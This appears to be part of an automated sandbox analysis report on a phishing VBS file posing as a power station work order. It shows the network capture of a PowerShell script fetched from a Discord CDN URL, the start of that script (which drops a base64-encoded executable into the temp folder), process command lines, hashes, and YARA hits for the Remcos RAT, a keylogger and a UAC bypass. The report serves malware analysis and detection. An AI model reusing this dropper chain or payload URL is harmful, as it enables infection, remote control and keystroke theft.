                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                        Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449730162.159.129.2334437340C:\Windows\System32\wscript.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:31:08 UTC475OUTGET /attachments/1295304757166080020/1316684745500790864/IGBO.ps1?ex=675bf1ba&is=675aa03a&hm=3e85baf94837620960229189756d21650fd643b90a2f7188dd60919d17e93238& HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-ch
                                                                        UA-CPU: AMD64
                                                                        Accept-Encoding: gzip, deflate
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                        Host: cdn.discordapp.com
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:31:08 UTC1208INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:31:08 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Content-Length: 718288
                                                                        Connection: close
                                                                        CF-Ray: 8f1079ed6aea4276-EWR
                                                                        CF-Cache-Status: HIT
                                                                        Accept-Ranges: bytes, bytes
                                                                        Age: 41579
                                                                        Cache-Control: public, max-age=31536000
                                                                        Content-Disposition: attachment; filename="IGBO.ps1"
                                                                        ETag: "cf9811311721d98ced8580790789851b"
                                                                        Expires: Fri, 12 Dec 2025 20:31:08 GMT
                                                                        Last-Modified: Thu, 12 Dec 2024 08:35:06 GMT
                                                                        Vary: Accept-Encoding
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        x-goog-generation: 1733992506219034
                                                                        x-goog-hash: crc32c=durjgA==
                                                                        x-goog-hash: md5=z5gRMRch2YzthYB5B4mFGw==
                                                                        x-goog-metageneration: 1
                                                                        x-goog-storage-class: STANDARD
                                                                        x-goog-stored-content-encoding: identity
                                                                        x-goog-stored-content-length: 718288
                                                                        x-guploader-uploadid: AFiumC5YT4MgitrQsb9HOufw0uNlqDV_Iq9oHnYObAEYAPyf9scUOqWThiNVUJpkqsG78K1ocFnGfAn7PQ
                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                        Set-Cookie: __cf_bm=QO4sQo5SCIsxod1l1Tbsgo4m40USX5WzkXid_Z738Vg-1734035468-1.0.1.1-lgls9VP06uC.gm5NvYg5Wo46gJP7TnuqR7YB_82CbqQFJrV5X34UxgiKYi9ObicgoH.8ZIKeLIQ2iSm2J.MbpA; path=/; expires=Thu, 12-Dec-24 21:01:08 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                        2024-12-12 20:31:08 UTC509INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 30 46 4b 74 4b 4e 4b 66 4d 4a 74 66 6b 58 76 44 57 75 70 39 72 47 70 4a 50 33 66 34 45 4e 35 72 6a 5a 4d 74 42 70 77 45 42 35 49 6c 62 6b 71 73 6c 75 49 76 58 35 44 36 4d 77 52 44 55 32 35 71 58 4e 49 42 46 56 6a 4f 34 69 41 45 4f 50 33 62 44 65 66 35 33 34 57 42 30 78 6c 76 68 68 33 4a 74 51 66 36 6e 6b 6b 4e 56 50 58 53 6f 50 6f 6b 56 41 56 32 4d 6a 59 52 66 51 75 4f 6b 37 76 6d 52 56 52 4f 4c 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                        Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0FKtKNKfMJtfkXvDWup9rGpJP3f4EN5rjZMtBpwEB5IlbkqsluIvX5D6MwRDU25qXNIBFVjO4iAEOP3bDef534WB0xlvhh3JtQf6nkkNVPXSoPokVAV2MjYRfQuOk7vmRVROLg%3D%3D"}],"group":"cf-nel","max_age":604800
                                                                        2024-12-12 20:31:08 UTC1021INData Raw: 24 70 3d 5b 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 22 78 2e 65 78 65 22 29 0d 0a 5b 49 4f 2e 46 69 6c 65 5d 3a 3a 57 72 69 74 65 41 6c 6c 42 79 74 65 73 28 24 70 2c 5b 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75
                                                                        Data Ascii: $p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu
                                                                        2024-12-12 20:31:08 UTC1369INData Raw: 64 59 41 4e 68 51 30 4d 31 4f 75 67 62 6e 57 64 46 75 33 6f 53 41 70 65 42 75 42 64 30 44 41 4e 42 36 50 67 6d 53 64 59 37 45 30 2b 6d 7a 5a 55 4b 4e 61 63 33 78 30 53 54 39 62 78 65 6c 30 7a 58 6e 74 4a 57 2f 47 75 71 54 46 53 5a 6b 38 6c 48 77 64 6f 57 48 54 70 6e 59 2b 4f 6a 73 77 38 76 64 34 42 57 63 64 30 73 77 41 65 2b 49 68 7a 43 72 37 67 76 63 32 71 57 52 5a 66 37 56 4e 6b 63 54 37 72 48 46 71 74 6e 68 7a 41 4e 6f 7a 37 71 78 54 4b 4e 31 7a 65 67 65 30 78 59 6e 37 74 4a 68 39 46 34 2b 58 63 44 4d 42 71 51 30 4c 4e 73 30 43 63 51 50 7a 6f 4a 42 6e 56 35 50 6a 4b 49 4a 34 6e 62 69 50 59 69 6c 36 67 77 42 6c 53 34 46 68 52 48 46 4f 6e 57 34 4a 61 4c 31 42 4e 73 32 2f 49 44 57 78 6a 45 7a 55 74 55 32 61 2b 66 6b 53 58 49 4d 4b 2b 59 68 79 36 6d 72 63
                                                                        Data Ascii: dYANhQ0M1OugbnWdFu3oSApeBuBd0DANB6PgmSdY7E0+mzZUKNac3x0ST9bxel0zXntJW/GuqTFSZk8lHwdoWHTpnY+Ojsw8vd4BWcd0swAe+IhzCr7gvc2qWRZf7VNkcT7rHFqtnhzANoz7qxTKN1zege0xYn7tJh9F4+XcDMBqQ0LNs0CcQPzoJBnV5PjKIJ4nbiPYil6gwBlS4FhRHFOnW4JaL1BNs2/IDWxjEzUtU2a+fkSXIMK+Yhy6mrc
                                                                        2024-12-12 20:31:08 UTC1369INData Raw: 4d 46 46 31 33 43 33 72 41 65 48 43 7a 42 76 45 57 4b 34 30 41 62 7a 46 46 32 59 42 45 4e 41 31 68 39 50 79 72 4b 52 55 38 46 4a 5a 52 72 44 48 68 69 37 4f 68 51 38 41 41 6c 64 76 72 76 6f 35 6a 6b 32 31 36 4f 67 53 2b 33 65 63 42 62 76 36 30 68 78 49 4d 72 62 76 44 71 74 76 46 32 68 49 4a 39 59 6d 41 4d 6f 66 79 41 63 4f 33 77 2f 43 62 42 44 4f 51 6b 53 53 79 7a 67 4b 74 55 62 74 51 4b 43 38 5a 69 6a 41 63 78 2f 52 7a 44 4b 65 44 35 31 52 2f 68 2b 4c 75 69 4f 53 56 67 46 35 65 6a 55 39 38 73 76 43 49 35 5a 7a 49 36 55 4a 70 79 44 5a 43 71 45 45 41 72 36 65 45 30 55 6f 69 4a 42 6b 32 66 2b 52 65 55 56 52 37 31 62 31 62 37 48 4c 4a 59 68 4a 69 67 48 35 39 39 53 43 4f 42 61 41 49 66 53 6c 5a 43 6b 65 49 42 42 44 44 6f 73 6a 44 61 34 52 45 4b 48 4d 62 62 33
                                                                        Data Ascii: MFF13C3rAeHCzBvEWK40AbzFF2YBENA1h9PyrKRU8FJZRrDHhi7OhQ8AAldvrvo5jk216OgS+3ecBbv60hxIMrbvDqtvF2hIJ9YmAMofyAcO3w/CbBDOQkSSyzgKtUbtQKC8ZijAcx/RzDKeD51R/h+LuiOSVgF5ejU98svCI5ZzI6UJpyDZCqEEAr6eE0UoiJBk2f+ReUVR71b1b7HLJYhJigH599SCOBaAIfSlZCkeIBBDDosjDa4REKHMbb3
                                                                        2024-12-12 20:31:08 UTC1369INData Raw: 65 46 72 31 6d 33 2f 69 62 31 4c 69 39 4d 71 67 47 4d 4a 70 77 36 6d 41 59 64 75 6e 49 75 54 50 38 65 47 47 52 63 76 71 6a 79 56 2b 72 2b 50 70 6a 78 2f 42 48 43 31 52 50 36 4c 7a 4d 61 6d 6e 33 4f 41 4a 48 46 6a 33 6a 65 64 6f 47 58 2b 6f 30 69 57 44 54 6d 38 68 55 4f 54 4f 54 59 37 32 34 69 58 59 4a 61 42 77 42 49 4b 58 63 4f 51 56 71 63 57 67 79 74 2f 47 77 35 6a 79 43 2f 6c 65 46 54 69 57 43 65 6a 74 74 72 75 35 38 44 6f 6d 76 6a 33 55 6b 6f 32 74 63 4c 4b 76 70 6a 45 6e 41 79 6d 31 41 46 51 53 4c 39 53 61 4a 41 7a 47 61 5a 75 6b 4d 6e 79 79 57 77 71 2f 61 6e 78 54 4d 73 64 48 38 6f 6f 56 6b 46 68 66 2b 76 4b 76 6b 70 62 61 73 6f 63 6d 59 38 6e 71 39 44 58 4a 69 4d 41 70 43 70 55 71 6c 31 54 75 42 71 45 61 33 33 63 58 6c 48 34 62 57 33 78 56 6b 52 79
                                                                        Data Ascii: eFr1m3/ib1Li9MqgGMJpw6mAYdunIuTP8eGGRcvqjyV+r+Ppjx/BHC1RP6LzMamn3OAJHFj3jedoGX+o0iWDTm8hUOTOTY724iXYJaBwBIKXcOQVqcWgyt/Gw5jyC/leFTiWCejttru58Domvj3Uko2tcLKvpjEnAym1AFQSL9SaJAzGaZukMnyyWwq/anxTMsdH8ooVkFhf+vKvkpbasocmY8nq9DXJiMApCpUql1TuBqEa33cXlH4bW3xVkRy
                                                                        2024-12-12 20:31:08 UTC1369INData Raw: 49 4f 54 74 75 69 57 7a 77 73 51 54 62 42 36 47 34 31 66 6c 45 52 49 76 6a 45 6a 41 70 5a 32 47 62 65 33 78 52 4e 42 6f 6e 4b 66 56 31 42 59 49 38 33 4a 2b 76 66 2b 4f 2b 54 56 2f 75 56 73 4d 35 46 54 5a 70 5a 39 64 47 4c 58 66 42 47 63 35 56 4b 78 75 4f 52 51 7a 72 59 45 37 30 61 4a 56 65 34 4b 78 30 75 70 7a 34 41 42 6c 34 51 6f 79 4d 77 4f 46 42 5a 36 6f 6d 69 59 47 34 70 4b 46 65 45 4e 70 53 76 47 52 63 4e 4b 63 75 53 66 71 71 6b 50 74 48 54 4f 54 7a 4c 57 55 37 62 74 5a 5a 57 56 32 69 6e 6c 6a 61 63 4d 2f 36 75 63 54 34 48 42 2f 7a 68 64 57 71 74 6c 76 43 57 46 43 53 56 57 4a 63 48 36 77 74 36 53 64 34 6e 37 45 53 4f 63 5a 62 7a 78 69 48 52 6d 2f 4d 39 67 78 31 6d 6d 73 63 53 77 7a 53 2b 53 76 58 75 61 5a 57 64 42 6e 71 49 72 58 43 42 30 39 73 66 4d
                                                                        Data Ascii: IOTtuiWzwsQTbB6G41flERIvjEjApZ2Gbe3xRNBonKfV1BYI83J+vf+O+TV/uVsM5FTZpZ9dGLXfBGc5VKxuORQzrYE70aJVe4Kx0upz4ABl4QoyMwOFBZ6omiYG4pKFeENpSvGRcNKcuSfqqkPtHTOTzLWU7btZZWV2inljacM/6ucT4HB/zhdWqtlvCWFCSVWJcH6wt6Sd4n7ESOcZbzxiHRm/M9gx1mmscSwzS+SvXuaZWdBnqIrXCB09sfM
                                                                        2024-12-12 20:31:08 UTC1369INData Raw: 48 47 44 58 39 30 47 33 58 68 57 63 66 50 61 77 56 32 6f 56 63 38 35 74 4e 57 58 47 5a 48 52 70 70 6b 6e 79 43 33 6e 6d 6f 50 63 4f 66 4a 71 63 72 31 72 78 79 66 75 30 39 2f 42 69 73 49 77 61 7a 59 46 79 6d 5a 32 6d 56 34 57 6c 6f 58 38 6f 62 70 57 35 42 62 62 43 33 47 73 33 79 63 62 38 34 4b 46 31 55 57 62 72 48 78 38 6a 39 79 72 42 4b 38 56 62 54 4b 4a 49 51 39 74 2b 33 64 34 61 47 61 73 5a 4f 4c 38 2b 49 58 75 76 68 37 63 4d 78 50 48 37 55 34 6f 4c 30 77 75 2f 75 74 33 70 67 6f 73 49 78 44 59 5a 73 44 38 77 6f 4f 6f 6a 37 38 30 33 4e 2f 65 6f 6a 46 49 74 4c 53 62 59 37 48 6c 2f 73 50 79 4d 52 45 57 69 4d 6b 7a 76 68 48 50 38 55 39 51 57 72 48 54 79 45 43 46 59 78 37 43 64 71 51 68 58 31 58 75 6b 63 61 52 64 62 49 49 56 48 4d 6a 42 70 6f 5a 42 67 36 63
                                                                        Data Ascii: HGDX90G3XhWcfPawV2oVc85tNWXGZHRppknyC3nmoPcOfJqcr1rxyfu09/BisIwazYFymZ2mV4WloX8obpW5BbbC3Gs3ycb84KF1UWbrHx8j9yrBK8VbTKJIQ9t+3d4aGasZOL8+IXuvh7cMxPH7U4oL0wu/ut3pgosIxDYZsD8woOoj7803N/eojFItLSbY7Hl/sPyMREWiMkzvhHP8U9QWrHTyECFYx7CdqQhX1XukcaRdbIIVHMjBpoZBg6c
                                                                        2024-12-12 20:31:08 UTC1369INData Raw: 43 4e 32 48 38 64 48 46 4d 52 76 48 6f 4c 4a 62 78 2b 30 59 59 6b 30 61 4f 4f 45 70 63 7a 35 49 64 39 54 62 7a 41 78 78 30 71 58 4e 38 56 52 6c 70 48 6c 69 43 4c 62 57 6d 59 71 30 65 7a 6b 34 38 72 54 47 55 67 55 69 78 4e 63 72 6a 72 4e 63 70 46 4d 59 35 59 58 6d 4f 39 42 30 56 48 64 43 43 62 48 63 39 6e 72 64 61 66 66 4a 61 35 4f 6a 62 54 4b 67 6f 48 36 37 54 30 32 6b 7a 2b 6c 47 51 69 52 47 53 4e 35 69 44 69 48 2f 79 6b 73 78 41 30 4e 30 7a 45 56 73 38 46 37 36 6a 63 59 4d 46 44 4c 74 74 30 51 4e 78 53 4c 39 35 55 7a 4b 72 33 79 4d 52 46 45 4f 5a 33 4d 73 62 4f 79 74 58 51 50 49 2f 49 4d 73 36 7a 56 62 65 64 78 48 59 2f 2f 2b 59 41 78 62 2f 6f 6b 59 36 57 64 6a 32 4e 6c 61 34 4a 6c 72 69 59 36 76 4e 57 6e 48 52 6a 4b 43 51 68 34 52 51 79 75 64 49 38 4d
                                                                        Data Ascii: CN2H8dHFMRvHoLJbx+0YYk0aOOEpcz5Id9TbzAxx0qXN8VRlpHliCLbWmYq0ezk48rTGUgUixNcrjrNcpFMY5YXmO9B0VHdCCbHc9nrdaffJa5OjbTKgoH67T02kz+lGQiRGSN5iDiH/yksxA0N0zEVs8F76jcYMFDLtt0QNxSL95UzKr3yMRFEOZ3MsbOytXQPI/IMs6zVbedxHY//+YAxb/okY6Wdj2Nla4JlriY6vNWnHRjKCQh4RQyudI8M
                                                                        2024-12-12 20:31:08 UTC1369INData Raw: 71 57 38 4f 4a 35 57 43 50 6f 6c 34 31 77 35 2f 6d 4e 44 38 53 69 38 45 2f 67 70 45 67 4a 2f 75 67 6f 67 30 39 67 63 43 2b 76 66 53 57 59 64 2f 4c 74 55 6d 56 5a 34 39 63 72 75 42 76 37 42 4c 4f 53 55 57 55 6e 4a 34 6a 56 4d 6e 7a 64 66 75 67 78 4b 74 31 34 78 35 4b 77 54 39 71 72 6c 53 34 69 31 70 63 55 2b 74 61 76 36 75 4e 61 70 74 38 61 79 30 58 63 41 4b 43 49 4d 62 72 45 47 72 68 32 2f 78 48 61 6a 66 42 58 2f 70 72 52 59 4b 7a 2f 34 2f 65 51 75 32 43 32 75 64 50 31 7a 65 31 4b 54 4f 72 55 78 77 4d 44 65 43 42 2f 76 6d 31 53 49 5a 6e 37 72 70 59 37 54 45 31 65 6d 34 35 44 36 2b 62 74 68 68 68 4c 66 65 54 74 75 38 47 66 6a 56 6c 30 76 2f 41 4c 53 30 71 77 77 34 5a 4c 52 4f 37 6b 58 6a 71 75 43 76 38 57 54 7a 70 79 65 30 4b 61 47 65 41 6d 48 52 54 74 65
                                                                        Data Ascii: qW8OJ5WCPol41w5/mND8Si8E/gpEgJ/ugog09gcC+vfSWYd/LtUmVZ49cruBv7BLOSUWUnJ4jVMnzdfugxKt14x5KwT9qrlS4i1pcU+tav6uNapt8ay0XcAKCIMbrEGrh2/xHajfBX/prRYKz/4/eQu2C2udP1ze1KTOrUxwMDeCB/vm1SIZn7rpY7TE1em45D6+bthhhLfeTtu8GfjVl0v/ALS0qww4ZLRO7kXjquCv8WTzpye0KaGeAmHRTte
                                                                        2024-12-12 20:31:08 UTC1369INData Raw: 67 59 47 45 47 78 2f 70 34 2f 66 4f 54 76 4f 52 54 79 61 31 6c 53 52 58 4b 6b 52 43 75 34 2f 61 67 67 51 6c 6d 5a 64 2b 52 4c 46 4e 41 6c 5a 34 39 41 71 52 76 6a 68 79 6b 4e 43 36 75 6d 79 52 33 73 78 31 78 4f 66 75 71 57 7a 79 68 31 59 7a 41 59 42 45 63 52 65 41 34 46 32 53 73 43 4e 6e 49 42 76 50 35 72 30 4e 2f 38 4c 2f 75 53 62 33 2b 74 52 53 72 64 5a 35 71 46 74 79 52 39 73 36 5a 6b 2f 58 44 51 50 4f 64 2f 51 4a 4a 30 66 4f 51 48 51 77 4d 67 2b 67 67 44 55 42 62 71 6e 65 35 4f 78 57 2b 32 45 37 4b 66 73 5a 58 6b 44 51 47 64 41 69 70 49 69 4e 72 31 4e 38 70 63 51 57 5a 2f 41 52 62 6b 71 65 35 66 58 58 33 53 42 4b 41 4b 79 55 45 4a 73 76 6c 38 41 51 36 72 71 6f 4a 53 72 4d 6a 33 42 32 41 45 31 61 76 77 38 54 73 42 52 43 73 4a 47 64 59 2f 2f 31 43 2f 39
                                                                        Data Ascii: gYGEGx/p4/fOTvORTya1lSRXKkRCu4/aggQlmZd+RLFNAlZ49AqRvjhykNC6umyR3sx1xOfuqWzyh1YzAYBEcReA4F2SsCNnIBvP5r0N/8L/uSb3+tRSrdZ5qFtyR9s6Zk/XDQPOd/QJJ0fOQHQwMg+ggDUBbqne5OxW+2E7KfsZXkDQGdAipIiNr1N8pcQWZ/ARbkqe5fXX3SBKAKyUEJsvl8AQ6rqoJSrMj3B2AE1avw8TsBRCsJGdY//1C/9


                                                                        Click to jump to process

                                                                        Click to jump to process

                                                                        Click to dive into process behavior distribution

                                                                        Click to jump to process

                                                                        Target ID:0
                                                                        Start time:15:31:04
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs"
                                                                        Imagebase:0x7ff6b0d50000
                                                                        File size:170'496 bytes
                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:1
                                                                        Start time:15:31:09
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:2
                                                                        Start time:15:31:09
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:15:31:16
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs"
                                                                        Imagebase:0x7ff6b0d50000
                                                                        File size:170'496 bytes
                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:4
                                                                        Start time:15:31:16
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:15:31:16
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:6
                                                                        Start time:15:31:18
                                                                        Start date:12/12/2024
                                                                        Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                        Imagebase:0x5a0000
                                                                        File size:538'624 bytes
                                                                        MD5 hash:2C248753C0D81181227BB95C0BC614CF
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.1856416817.000000000446A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.1856416817.000000000446A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.1856416817.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.1856416817.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.1856416817.00000000044EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.1856416817.00000000044EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.1856416817.00000000044EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:7
                                                                        Start time:15:31:18
                                                                        Start date:12/12/2024
                                                                        Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                        Imagebase:0xe00000
                                                                        File size:538'624 bytes
                                                                        MD5 hash:2C248753C0D81181227BB95C0BC614CF
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.1856200221.0000000004CAF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.1856200221.0000000004CAF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.1856200221.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.1856200221.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.1856200221.0000000004E18000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.1856200221.0000000004E18000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.1856200221.0000000004D1F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
